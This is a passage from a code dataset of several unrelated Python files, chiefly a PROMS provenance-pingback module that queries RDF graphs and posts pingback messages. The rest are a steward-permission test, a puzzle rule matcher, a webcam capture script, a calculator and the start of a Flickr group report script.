kop)\n        print(rub, 'rub ', kop, 'kop')\n    else:\n        raise ValueError\nexcept ValueError:\n    print('Error')\n","sub_path":"pylab1/pelab1.1.py","file_name":"pelab1.1.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"474061399","text":"import settings\nimport cs_functions  # used throughout but missing from the original imports\nfrom rdflib import URIRef\n\n\n# Strategy 1: Given Pingback\ndef try_strategy_1(g, excluded_entities=[]):\n    # Get the URIs of the Entities for pingbacks\n    entities = cs_functions.get_candidates(g)\n\n    
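Note: the strategy functions in this module lean on cs_functions.get_candidates(g), whose source is not part of this sample. A plausible, purely hypothetical sketch of such a helper, assuming rdflib and assuming "candidates" means every prov:Entity URI in the report graph:

from rdflib import Graph

def get_candidates(g):
    # Hypothetical stand-in for cs_functions.get_candidates:
    # collect the URI of every prov:Entity in the report graph.
    q = '''
        PREFIX prov: <http://www.w3.org/ns/prov#>
        SELECT DISTINCT ?e WHERE { ?e a prov:Entity . }
    '''
    return [str(row['e']) for row in g.query(q)]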
# remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n # For each Entity, look for a prov:pingback property\n entities_with_pingback_uris = []\n for entity in entities:\n q = '''\n PREFIX rdfs: \n PREFIX prov: \n SELECT *\n WHERE {\n ?s ?p ?o .\n <''' + entity + '''> prov:pingback ?o .\n }\n '''\n for row in g.query(q):\n entities_with_pingback_uris.append({\n 'entity': str(row['s']),\n 'pingback_endpoint': str(row['o'])}\n )\n\n successful_pingbacks = []\n for entity in entities_with_pingback_uris:\n pingback_uri = entity['pingback_endpoint']\n entity_uri = [entity['entity']]\n result = send_pingback(pingback_uri, entity_uri, further_links=[])\n if result[0]:\n successful_pingbacks.append(entity_uri)\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': entities_with_pingback_uris,\n 'pingback_successful': successful_pingbacks\n }\n\n\n# Strategy 2: Given Provenance\ndef try_strategy_2(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n # Get any Entities with a prov:has_provenance, prov:has_query_service or dct:provenance property\n # If one is found, stage for the sending of provenance information bundles\n entities_with_provenance_locations = []\n entities_with_provenance_query_services = []\n for entity in entities:\n q = '''\n PREFIX rdfs: \n PREFIX prov: \n PREFIX dc11: \n SELECT *\n WHERE {\n ?s ?p ?o .\n {<''' + entity + '''> prov:has_provenance ?o .}\n UNION\n {<''' + entity + '''> dc11:provenance ?o .}\n UNION\n {<''' + entity + '''> prov:has_query_service ?o .}\n }\n '''\n for row in g.query(q):\n if str(row['p']) in ['http://www.w3.org/ns/prov#has_provenance', 'http://purl.org/dc/elements/1.1/provenance']:\n entities_with_provenance_locations.append({\n 'entity': str(row['s']),\n 'provenance_location': str(row['o'])\n })\n elif str(row['p']) == 'http://www.w3.org/ns/prov#has_query_service':\n entities_with_provenance_query_services.append({\n 'entity': str(row['s']),\n 'provenance_service': str(row['o'])\n })\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': [],\n 'pingback_successful': []\n }\n\n\n# Strategy 3: Known Provenance Stores\ndef try_strategy_3(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n successful_pingbacks = []\n for entity in entities:\n # make all the PROV-AQ links for each entity\n further_links = [\n {\n 'resource': entity,\n 'rel': 'has_query_service',\n 'anchor': settings.PROMS_INSTANCE_NAMESPACE_URI + '/function/sparql'\n },\n {\n 'resource': entity,\n 'rel': 'has_provenance',\n 'anchor': settings.ENTITY_BASE_URI + '/?uri=' + entity\n }\n ]\n for known_store_pingback_endpoints in settings.KNOWN_PROVENANCE_STORE_PINGBACK_ENDPOINTS:\n if known_store_pingback_endpoints != '':\n #result = send_provaq_pingback(known_store_pingback_endpoints, None, further_links)\n proms_pingback_msg = generate_proms_msg_from_report(g, entities, 
known_store_pingback_endpoints)\n result1 = send_proms_pingback(known_store_pingback_endpoints, proms_pingback_msg)\n #if result[0]:\n # successful_pingbacks.append(entity)\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': entities,\n 'pingback_successful': successful_pingbacks\n }\n\n\n# Strategy 4: Pingback Lookup\ndef try_strategy_4(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n # For each Entity, follow it's URI to look for a prov:pingback property\n entities_with_pingback_uris = []\n for entity in entities:\n \"\"\"\n # look for an RDF description of the Entity\n rdf = cs_functions.get_entity_rdf(entity)\n if rdf[0]:\n print entity\n print rdf[1]\n else:\n print entity\n print 'failed to get RDF'\n \"\"\"\n pingback_endpoints = get_pingback_endpoints_via_lookup(g, entity)\n if len(pingback_endpoints) > 0:\n entities_with_pingback_uris.append({\n 'entity': entity,\n 'pingback_endpoints': pingback_endpoints\n })\n\n successful_pingbacks = []\n for entity in entities_with_pingback_uris:\n entity_uri = [entity['entity']]\n pingback_uris = entity['pingback_endpoints']\n for pingback_uri in pingback_uris:\n result = send_pingback(pingback_uri, entity_uri, further_links=[])\n if result[0]:\n successful_pingbacks.append(entity_uri)\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': entities_with_pingback_uris,\n 'pingback_successful': successful_pingbacks\n }\n\n\n# Endpoint Lookup Discovery\ndef try_strategy_5(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n entities_with_pingback_uris = []\n for entity in entities:\n query_service_endpoints = get_has_query_service_endpoints_via_lookup(g, entity)\n if len(query_service_endpoints) > 0:\n entities_with_pingback_uris.append({\n 'entity': entity,\n 'pingback_endpoints': query_service_endpoints\n })\n\n successful_pingbacks = []\n for entity in entities_with_pingback_uris:\n pingback_uris = entity['pingback_endpoints']\n entity_uri = [entity['entity']]\n for pingback_uri in pingback_uris:\n result = send_pingback(pingback_uri, entity_uri, further_links=[])\n if result[0]:\n if entity_uri not in successful_pingbacks:\n successful_pingbacks.append(entity_uri)\n\n # return the list of entities for which pingbacks were attempted and entities for which pingbacks were successful\n return {\n 'pingback_attempt': entities,\n 'pingback_successful': successful_pingbacks\n }\n\n\n# Strategy 6: Data Provider Node Given\n# not described in paper yet\ndef try_strategy_6(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n\n# Strategy 6: Data Provider Node Lookup\n# not described in paper yet\ndef try_strategy_7(g, excluded_entities=[]):\n # Get the URIs of the Entities for pingbacks\n entities = 
cs_functions.get_candidates(g)\n\n # remove those Entities specifically excluded (as a result of other strategies)\n for entity in excluded_entities:\n entities.remove(entity)\n\n\n# Strategy 1: Given Pingback\ndef get_pingback_endpoints_via_given(g, entity_uri):\n pingback_endpoints = []\n q = '''\n PREFIX prov: \n SELECT ?pb\n WHERE {\n <''' + entity_uri + '''> a prov:Entity .\n <''' + entity_uri + '''> prov:pingback ?pb .\n }\n '''\n for row in g.query(q):\n pingback_endpoints.append(str(row['pb']))\n return pingback_endpoints\n\n\n# Strategy 2: Given Provenance\ndef get_has_query_service_endpoints_via_given(g, entity_uri):\n provenance_endpoints = []\n q = '''\n PREFIX prov: \n SELECT ?ps\n WHERE {\n <''' + entity_uri + '''> a prov:Entity ;\n prov:has_query_service ?ps .\n }\n '''\n for row in g.query(q):\n provenance_endpoints.append(str(row['ps']))\n return provenance_endpoints\n\n\n# Strategies 4 & 5\ndef is_dereferencable(entity_uri):\n import requests\n from requests import exceptions\n\n headers = {'Accept': 'text/turtle;q=1,application/ld+json;q=0.75,application/rdf+xml;q=0.5'}\n try:\n r = requests.get(entity_uri, headers=headers, allow_redirects=True)\n if r.status_code == 200:\n return [True, r.text, r.headers]\n else:\n return [False, 'Could not dereference URI']\n except exceptions.RequestException as e:\n return [False, 'Could not dereference URI']\n\n\n# Strategies 4 & 5\ndef has_valid_rdf_meatadata(rdf_metadata, content_type_header):\n # test header. Must find one of three known RDF serialisations\n if 'text/turtle' in content_type_header:\n format = 'turtle'\n elif 'application/ld+json' in content_type_header:\n format = 'json-ld'\n elif 'application/rdf+xml' in content_type_header:\n format = 'xml'\n else:\n return [False, 'no RDF format given in header']\n\n if format is not None:\n from rdflib import Graph\n try:\n g = Graph().parse(data=rdf_metadata, format=format)\n return [True, g]\n except Exception as e:\n return [False, 'RDF format ' + format + ' indicated in header but unable to parse RDF data to graph. 
Error: ' + str(e)]\n\n\n# Strategy 4: Pingback Lookup\ndef get_pingback_endpoints_via_lookup(g, entity_uri):\n pingback_endpoints = []\n\n # find prov:pingback properties defined for this Entity\n q = '''\n PREFIX prov: \n SELECT ?pb\n WHERE {\n <''' + entity_uri + '''> a prov:Entity ;\n prov:pingback ?pb .\n }\n '''\n\n for row in g.query(q):\n pingback_endpoints.append(str(row['pb']))\n\n # find prov:pingback properties defined on a dcat:CatalogRecord for this dcat:Dataset\n q = '''\n PREFIX prov: \n PREFIX dcat: \n PREFIX foaf: \n SELECT ?pb\n WHERE {\n {\n <''' + entity_uri + '''> a dcat:Dataset ;\n foaf:isPrimaryTopicOf ?cr .\n ?cr prov:pingback ?pb .\n }\n UNION\n {\n ?cr a dcat:CatalogRecord ;\n foaf:primaryTopic <''' + entity_uri + '''> ;\n prov:pingback ?pb .\n }\n }\n '''\n\n for row in g.query(q):\n pingback_endpoints.append(str(row['pb']))\n\n # find a dpn:Service class object, of type dpns:ProvenancePingbackService, that has the property dpn:hostsDataset indicating the Entity URI.\n # TODO: build a test dataset for this combo\n q = '''\n PREFIX dpn: \n PREFIX dpns: \n SELECT ?pb\n WHERE {\n ?s a dpns:ProvenancePingbackService ;\n dpns:hostsDataset <''' + entity_uri + '''> ;\n dpn:endpoint ?pb .\n }\n '''\n\n for row in g.query(q):\n pingback_endpoints.append(str(row['pb']))\n\n return pingback_endpoints\n\n\n# Strategy 5: Provenance Lookup\ndef get_has_query_service_endpoints_via_lookup(g, entity_uri):\n has_query_service_endpoints = []\n\n # find prov:has_query_service properties defined for this Entity\n q = '''\n PREFIX prov: \n SELECT ?pb\n WHERE {\n <''' + entity_uri + '''> a prov:Entity ;\n prov:has_query_service ?pb .\n }\n '''\n\n for row in g.query(q):\n has_query_service_endpoints.append(str(row['pb']))\n\n # find prov:has_query_service properties defined on a dcat:CatalogRecord for this dcat:Dataset\n q = '''\n PREFIX prov: \n PREFIX dcat: \n PREFIX foaf: \n SELECT ?pb\n WHERE {\n {\n <''' + entity_uri + '''> a dcat:Dataset ;\n foaf:isPrimaryTopicOf ?cr .\n ?cr prov:has_query_service ?pb .\n }\n UNION\n {\n ?cr a dcat:CatalogRecord ;\n foaf:primaryTopic <''' + entity_uri + '''> ;\n prov:has_query_service ?pb .\n }\n }\n '''\n\n for row in g.query(q):\n has_query_service_endpoints.append(str(row['pb']))\n\n # find a dpn:Service class object, of type dpns:ProvenanceService, that has the property dpn:hostsDataset indicating the Entity URI.\n # TODO: build a test dataset for this combo\n q = '''\n PREFIX dpn: \n PREFIX dpns: \n SELECT ?pb\n WHERE {\n ?s a dpns:ProvenanceService ;\n dpns:hostsDataset <''' + entity_uri + '''> ;\n dpn:endpoint ?pb .\n }\n '''\n\n for row in g.query(q):\n has_query_service_endpoints.append(str(row['pb']))\n\n return has_query_service_endpoints\n\n\ndef is_a_uri(uri_candidate):\n \"\"\"\n Validates a string as a URI\n\n :param uri_candidate: string\n :return: True or False\n \"\"\"\n import re\n # https://gist.github.com/dperini/729294\n URL_REGEX = re.compile(\n \"^\"\n # protocol identifier\n \"(?:(?:https?|ftp)://)\"\n # user:pass authentication\n \"(?:\\S+(?::\\S*)?@)?\"\n \"(?:\"\n # IP address exclusion\n # private & local networks\n \"(?!(?:10|127)(?:\\.\\d{1,3}){3})\"\n \"(?!(?:169\\.254|192\\.168)(?:\\.\\d{1,3}){2})\"\n \"(?!172\\.(?:1[6-9]|2\\d|3[0-1])(?:\\.\\d{1,3}){2})\"\n # IP address dotted notation octets\n # excludes loopback network 0.0.0.0\n # excludes reserved space >= 224.0.0.0\n # excludes network & broadcast addresses\n # (first & last IP address of each class)\n \"(?:[1-9]\\d?|1\\d\\d|2[01]\\d|22[0-3])\"\n 
\"(?:\\.(?:1?\\d{1,2}|2[0-4]\\d|25[0-5])){2}\"\n \"(?:\\.(?:[1-9]\\d?|1\\d\\d|2[0-4]\\d|25[0-4]))\"\n \"|\"\n # host name\n \"(?:(?:[a-z\\\\u00a1-\\\\uffff0-9]-?)*[a-z\\\\u00a1-\\\\uffff0-9]+)\"\n # domain name\n \"(?:\\.(?:[a-z\\\\u00a1-\\\\uffff0-9]-?)*[a-z\\\\u00a1-\\\\uffff0-9]+)*\"\n # TLD identifier\n \"(?:\\.(?:[a-z\\\\u00a1-\\\\uffff]{2,}))\"\n \")\"\n # port number\n \"(?::\\d{2,5})?\"\n # resource path\n \"(?:/\\S*)?\"\n \"$\"\n , re.UNICODE\n )\n return re.match(URL_REGEX, uri_candidate)\n\n\ndef make_link_headers(further_links):\n \"\"\"\n Makes the slightly tircky HTTP Link header, if any\n\n :param further_links: a list of dicts with 'resource', 'rel', & 'anchor' properties, all URIs\n :return: a string\n \"\"\"\n link_header_content = ''\n count = 0\n for further_link in further_links:\n if not is_a_uri(further_link['anchor']):\n raise PingbackFormulationError('Every anchor in a further_links array must be a valid URI')\n else:\n link_header_content += '<' + further_link['resource'] + '>; ' +\\\n 'rel=\"http://www.w3.org/ns/prov#' + further_link['rel'] + '\"; ' +\\\n 'anchor=\"' + further_link['anchor'] + '\",'\n count += 1\n return link_header_content[:-1] # remove last ','\n\n\ndef send_provaq_pingback(pingback_target_uri, uri_list=None, further_links=None):\n \"\"\"\n Generates and posts a PROV-AQ pingback message\n\n Messages formulated according to http://www.w3.org/TR/prov-aq/#provenance-pingback, specifically examples 12, 13 & 14\n :param pingback_target_uri: a URI, to where the pingback is sent\n :param uri_list: a list object of URIs\n :param further_links: a list of dicts with 'resource', 'rel', & 'anchor' properties, all URIs\n :return: True or an error message\n \"\"\"\n import requests\n\n headers = {'Content-Type': 'text/uri-list'}\n\n # if further links is set, iterate through them and create appropriate Link headers\n if further_links is not None:\n headers['Link'] = make_link_headers(further_links)\n\n # join the URIs into a string for the message body\n if uri_list is not None:\n body = '\\n'.join(uri_list) # the standard says CRLF (\\r\\n), not just \\n\n else:\n # if we have no URIs, set the body to None and set a Content-Length header of zero\n body = None\n headers['Content-Length'] = '0'\n\n # send the post, as per http://www.w3.org/TR/prov-aq/\n try:\n r = requests.post(pingback_target_uri, data=body, headers=headers)\n result = (r.status_code == 204)\n if result:\n return [True]\n else:\n return [False, r.content]\n except Exception as e:\n print(str(e))\n return [False, str(e)]\n\n\ndef send_proms_pingback(pingback_target_uri, payload, mimetype='text/turtle'):\n \"\"\"\n Generates and posts a PROMS pingback message\n\n :param pingback_target_uri: a URI, to where the pingback is sent\n :param payload: an RDF file, in one of the allowed formats and conformant with the PROMS pingback message spec\n :param mimetype: the mimetype of the RDF file being sent\n :return: True or an error message\n \"\"\"\n import requests\n\n headers = {'Content-Type': mimetype}\n\n # send the post\n try:\n r = requests.post(pingback_target_uri, data=payload, headers=headers)\n result = (r.status_code == 201)\n if result:\n return [True, r.content]\n else:\n return [False, r.content]\n except Exception as e:\n print(str(e))\n return [False, str(e)]\n\n\ndef generate_proms_msg_from_report(report_graph, entities_uris, pingback_target_uri, report_type='External'):\n if report_type == 'Basic':\n # we can't generate a Pingback message from a Basic report as there are no Entities 
defined\n raise PingbackFormulationError('A PROMS Pingback message cannot be generated from a PROMS Basic Report')\n elif report_type == 'External':\n # PROMS pingback message requirements (rules) from http://promsns.org/pingbacks/validator/about\n\n # For R1: assume that the Report from PROMS is already valid according to PROV-O\n\n # For R2: add a prov:pingback for each Entity being pingbacked for\n for entity_uri in entities_uris:\n report_graph.add((URIRef(entity_uri), URIRef('http://www.w3.org/ns/prov#pingback'), URIRef(pingback_target_uri)))\n\n # For R3: check that each Entity being pingbacked for is prov:used by the sole Activity\n # No need to check for any other conditions as the sole Actvity in an External Report is guarenteed\n for entity_uri in entities_uris:\n a = report_graph.query('''\n PREFIX prov: \n ASK\n WHERE {\n ?a a prov:Activity ;\n prov:used <''' + entity_uri + '''>\n }\n ''')\n if not a:\n raise PingbackFormulationError('The Entity <' + entity_uri + '> is not prov:used by the Enternal Report\\'s prov:Activity as required by PROMS pingback message rule R2 (see http://promsns.org/pingbacks/validator/about)')\n\n return report_graph.serialize(format='turtle')\n else: # Internal\n print('Internal')\n\n\nclass PingbackFormulationError(Exception):\n def __init__(self, *args):\n # *args is used to get a list of the parameters passed in\n self.args = [a for a in args]","sub_path":"modules/pingbacks/strategy_functions.py","file_name":"strategy_functions.py","file_ext":"py","file_size_in_byte":21313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111744516","text":"import pytest\n\nfrom plenum.common.constants import STEWARD\nfrom plenum.test.helper import waitRejectWithReason\nfrom plenum.test.pool_transactions.helper import addNewClient, sendAddNewClient\n\n\n@pytest.fixture(scope=\"module\")\ndef tconf(conf, tdir, request):\n oldThreshold = conf.stewardThreshold\n conf.baseDir = tdir\n conf.stewardThreshold = 5\n\n def reset():\n conf.stewardThreshold = oldThreshold\n\n request.addfinalizer(reset)\n return conf\n\n\ndef testOnlyAStewardCanAddAnotherSteward(looper, txnPoolNodeSet,\n tdirWithPoolTxns, poolTxnClientData,\n steward1, stewardWallet,\n client1, wallet1, client1Connected):\n addNewClient(STEWARD, looper, steward1, stewardWallet, \"testSteward1\")\n\n sendAddNewClient(STEWARD, \"testSteward2\", client1, wallet1)\n for node in txnPoolNodeSet:\n waitRejectWithReason(looper, client1,\n 'Only Steward is allowed to do these transactions',\n node.clientstack.name)\n\n\ndef testStewardsCanBeAddedOnlyTillAThresholdIsReached(looper, tconf,\n txnPoolNodeSet,\n tdirWithPoolTxns,\n poolTxnStewardData,\n steward1, stewardWallet):\n addNewClient(STEWARD, looper, steward1, stewardWallet, \"testSteward3\")\n\n sendAddNewClient(STEWARD, \"testSteward4\", steward1, stewardWallet)\n for node in txnPoolNodeSet:\n waitRejectWithReason(looper, steward1,\n 'New stewards cannot be added by other '\n 'stewards as there are already {} '\n 'stewards in the system'.format(tconf.stewardThreshold),\n node.clientstack.name)\n","sub_path":"plenum/test/pool_transactions/test_adding_stewards.py","file_name":"test_adding_stewards.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"16442145","text":"import fileinput\nimport re\nfrom copy import deepcopy\nfrom typing import List\n\n\ndef replace_item_in_list(lst, old, new):\n return [new if val 
== old else val for val in lst]\n\n\ndef has_integer_values(rule_dict):\n    return {key: value for key, value in rule_dict.items()\n            if type(value) is list and any([i for i in value if type(i) == int])}\n\n\ndef simplify_str_list(rule_dict, strings_dict):\n    # print(strings_dict)\n    for key, values in rule_dict.items():\n        # if key == 0:\n        #     print(values)\n        if not strings_dict.get(key, False) and all([True if type(v) == str else False for v in values]):\n            strings_dict[key] = f'({\"\".join(values)})'\n            rule_dict[key] = f'({\"\".join(values)})'\n            # rule_dict.pop(key)\n        # else:\n        #     strings_dict[key] = values\n    return strings_dict, rule_dict\n\n\ndef fill_in_rules(rule_dict):\n    new_rule_dict = deepcopy(rule_dict)\n    new_rule_dict = dict(sorted(new_rule_dict.items(), key=lambda item: item))\n    actual_strings = {key: value for key, value in rule_dict.items() if type(value) == str}\n    has_integers = True\n    while has_integers:\n        for rule_nr, actual_s in actual_strings.items():\n            new_rule_dict = {key: replace_item_in_list(values, rule_nr, actual_s)\n                             if type(values) is list else values\n                             for key, values in new_rule_dict.items()\n                             }\n        actual_strings, new_rule_dict = simplify_str_list(new_rule_dict, actual_strings)\n        has_integers = has_integer_values(new_rule_dict)\n        print(actual_strings.items())\n        # print(new_rule_dict)\n        # if has_integers:\n        #     actual_strings = {key: value for key, value in new_rule_dict.items() if type(value) == str}\n    return actual_strings\n\n\ndef check_rule(rule_zero, messages):\n    total = 0\n    exact_rule = '^' + rule_zero + '$'\n    print(exact_rule)\n    for message in messages:\n        if re.match(exact_rule, message):\n            total += 1\n    return total\n\n\ndef process(input_list: List):\n    \"\"\"\n\n    :param input_list:\n    :return:\n    \"\"\"\n    total = 0\n    rule_dict = {}\n    index = 0\n    line = input_list[index]\n    while line:\n        line_number = int(line.split(':')[0])\n        rule = line.split(':')[1]\n        if '\"' in rule:\n            rule_dict[line_number] = re.findall('\"([a-z])\"', rule)[0]\n        # elif '|' in rule:\n        #     rule = rule.replace(' ', '')\n        #     or_rule = re.findall('([0-9]+)\\|([0-9]+)', rule)[0]\n        #     or_rule = [[int(i) for i in list(n)] for n in or_rule]\n        #     rule_dict[line_number] = or_rule[0] + ['|'] + or_rule[1]\n        else:\n            rule_dict[line_number] = [int(i) if i != '|' else i for i in rule.strip().split(' ')]\n        index += 1\n        line = input_list[index]\n\n    index += 1\n    messages = input_list[index:]\n\n    return rule_dict, messages\n\n\nif __name__ == '__main__':\n    lines = [i.strip('\\n') for i in fileinput.input()]\n    print(lines[0:10])\n    rules, mess = process(lines)\n    print(f'Output: {rules}, \\n{mess}')\n    filled = fill_in_rules(rules)\n    print(f'filled: {filled}')\n    count_matches = check_rule(filled[0], mess)\n    print(f'matched rule zero: {count_matches}')\n","sub_path":"src/19_1_match_message_rule.py","file_name":"19_1_match_message_rule.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"607267129","text":"# coding:utf-8\n'''\nTo drive a camera from Python:\nVideoCapture is Windows-only,\non Linux you have to use OpenCV instead.\n'''\nimport time\nimport cv2\nimport numpy as np\n\"\"\"\nFunction: cv2.VideoCapture()\nPurpose : capture live image data from a camera\nReturns : yes\nParam 1 : camera index; 0 is the default camera (a laptop's built-in camera is usually 0),\n        or pass a video file name to load a local video file directly\n\"\"\"\ndef camera():\n    cap = cv2.VideoCapture(0)  # create a VideoCapture object\n    #filepath = '../image/'\n    pngname = time.strftime('%Y%m%d-%H%M%S')+'.png'\n    filepath = 'image/'+pngname  # the 'image' folder must already exist in the current directory\n    \n    while(1):\n        # get a frame\n        ret, frame = cap.read()\n        # show the frame in a window named 'capture'\n
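One detail worth calling out in the rule-matching sample above: check_rule() wraps the generated pattern in '^...$' because re.match() only anchors at the start of the string; re.fullmatch() is the more direct tool. A small sketch of the difference:

import re

pattern = '(a|b)b'
print(bool(re.match(pattern, 'abc')))      # True  -- match() accepts a prefix match
print(bool(re.fullmatch(pattern, 'abc')))  # False -- fullmatch() requires the whole string
print(bool(re.fullmatch(pattern, 'ab')))   # True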
        cv2.imshow(\"capture\", frame)\n        # wait 1 ms per frame; the delay must not be 0, otherwise you read a static frame\n        if cv2.waitKey(1) & 0xFF == ord('q'):\n            cv2.imwrite(filepath, frame)\n            \n            break\n\n    cap.release()  # release the camera\n    cv2.destroyAllWindows()  # destroy all windows that were created\n    return filepath\n\n\nif __name__=='__main__':\n    camera()\n","sub_path":"prph/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"270986177","text":"def is_number(input):\n\ttry:\n\t\treturn int(input);\n\texcept:\n\t\treturn None;\n\t\t\ndef is_valid_operator(operator):\n\treturn operator in [\"+\", \"-\", \"/\", \"*\"];\n\t\ndef ask_for_a_number(forceValidInput = True):\n\tuser_input = input(\"Enter a number: \");\n\tcasted_value = is_number(user_input);\n\tif forceValidInput:\n\t\twhile casted_value == None:\n\t\t\tuser_input = input(\"Enter a number: \");\n\t\t\tcasted_value = is_number(user_input);\n\treturn casted_value;\n\t\ndef ask_for_an_operator(forceValidInput = True):\n\tuser_input = input(\"Enter an operator: \");\n\tif forceValidInput:\n\t\twhile not is_valid_operator(user_input):\n\t\t\tuser_input = input(\"Enter an operator: \");\n\t\treturn user_input;\n\telse:\n\t\tif not is_valid_operator(user_input):\n\t\t\treturn None;\n\t\telse:\n\t\t\treturn user_input;\n\t\t\ndef calculate(operand1, operator, operand2):\n\tif operand1 == None or operator == None or operand2 == None:\n\t\treturn None;\n\tif operator == \"+\":\n\t\treturn operand1 + operand2;\n\telif operator == \"-\":\n\t\treturn operand1 - operand2;\n\telif operator == \"*\":\n\t\treturn operand1 * operand2;\n\telif operator == \"/\":\n\t\tif operand2 == 0:\n\t\t\tprint(\"Error: division by zero\");\n\t\t\treturn None;\n\t\telse:\n\t\t\treturn operand1 / operand2;\n\telse:\n\t\treturn None;\ndef simple_calculator():\n\tend_cond = True;\n\twhile end_cond:\n\t\tprint(\"Enter operand1\");\n\t\toperand1 = ask_for_a_number(False);\n\t\tif operand1 == None:\n\t\t\tend_cond = False;\n\t\telse:\n\t\t\toperator = ask_for_an_operator(True);\n\t\t\tprint(\"Enter operand2\");\n\t\t\toperand2 = ask_for_a_number(True);\n\t\t\tresult = calculate(operand1, operator, operand2);\n\t\t\tprint(f\"Result of calculation is: {result}\");\n\t\t\nif __name__ == \"__main__\":\n\tsimple_calculator();","sub_path":"SampleCalculator.py","file_name":"SampleCalculator.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"468204087","text":"# Procedures of script group-admin-report.py\n#\n# Author: Haraldo Albergaria\n# Date  : Jan 01, 2018\n#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n\n###########################################\n#   !!! IMPLEMENT THE PROCEDURES HERE !!!  #\n#   !!! MODIFY ONLY THE ANNOTATED LINES !!! #
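The camera sample above loops until 'q' is pressed before saving a frame. A minimal single-shot variant, assuming OpenCV is installed and a webcam is available at index 0:

import cv2

cap = cv2.VideoCapture(0)
ok, frame = cap.read()  # grab one frame
if ok:
    cv2.imwrite('frame.png', frame)
cap.release()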
#\n###########################################\n\n\nimport flickrapi\nimport api_credentials\nimport json\nimport time\nimport group_data\nimport data\n\nfrom datetime import datetime\n\nfrom common import getExif\nfrom common import getLensModel\nfrom common import getFocalLength\n\n\n#===== CONSTANTS =================================#\n\napi_key = api_credentials.api_key\napi_secret = api_credentials.api_secret\n\ngroup_id = group_data.group_id\n\nlens_models = group_data.lens_models\nfocal_lengths = group_data.focal_lengths\n\n# Flickr api access\nflickr = flickrapi.FlickrAPI(api_key, api_secret, format='parsed-json')\n\n\n#===== PROCEDURES =======================================================#\n\ndef createRemoveScript(remove_file_name):\n remove_file = open(remove_file_name, 'w')\n remove_file.write('#!/usr/bin/python3\\n\\n')\n remove_file.write('import flickrapi\\n')\n remove_file.write('import json\\n')\n remove_file.write('import procs\\n')\n remove_file.write('import api_credentials\\n\\n')\n remove_file.write('api_key = api_credentials.api_key\\n')\n remove_file.write('api_secret = api_credentials.api_secret\\n\\n\\n')\n remove_file.write('### PHOTOS TO REMOVE:\\n\\n')\n remove_file.close()\n\ndef addReportHeader(report_file_name, html_file_name, group_name, photos_in_report):\n report_file = open(report_file_name,'w')\n report_file.write('+==============================================================================================================================================================================+\\n')\n if photos_in_report > 1:\n report_file.write('| GROUP ADMIN REPORT {0:30.30} {1:>7} PHOTOS ADDED | \\n'.format(group_name, photos_in_report))\n else:\n report_file.write('| GROUP ADMIN REPORT {0:30.30} {1:>7} PHOTO ADDED | \\n'.format(group_name, photos_in_report))\n report_file.write('+==============================================================================================================================================================================+\\n')\n report_file.close()\n\n now = datetime.now()\n report_file = open(html_file_name,'w')\n report_file.write('\\n\\n\\n\\nGroup Admin Report\\n')\n report_file.write('\\n\\n\\n\\n')\n report_file.write('Updated: {}

\\n'.format(datetime.strftime(now, \"%d/%m/%y %H:%M:%S\")))\n report_file.write('+==============================================================================================================================================================================+
\\n')\n if photos_in_report > 1:\n report_file.write('| GROUP ADMIN REPORT {0:30.30} {1:>7} PHOTOS ADDED |
\\n'.format(group_name, photos_in_report).replace(' ',' '))\n else:\n report_file.write('| GROUP ADMIN REPORT {0:30.30} {1:>7} PHOTO ADDED |
\\n'.format(group_name, photos_in_report).replace(' ',' '))\n report_file.write('+==============================================================================================================================================================================+
\\n')\n report_file.close()\n\ndef addPageHeader(report_file_name, html_file_name, page, number_of_pages, photos_per_page):\n report_file = open(report_file_name,'a')\n report_file.write('\\n')\n report_file.write('+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\\n')\n report_file.write('| Page: {0:>5}/{1:<5} | Photos: {2:5} |\\n'.format(page, number_of_pages, photos_per_page))\n report_file.write('|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\\n')\n report_file.write('| | PHOTO | OWNER | LENS MODEL | F. LENGTH | DATE ADDED | ACTION |\\n')\n report_file.write('|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\\n')\n report_file.close()\n\n report_file = open(html_file_name,'a')\n report_file.write('
\\n')\n report_file.write('+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
\\n')\n report_file.write('| Page: {0:>5}/{1:<5} | Photos: {2:5} |
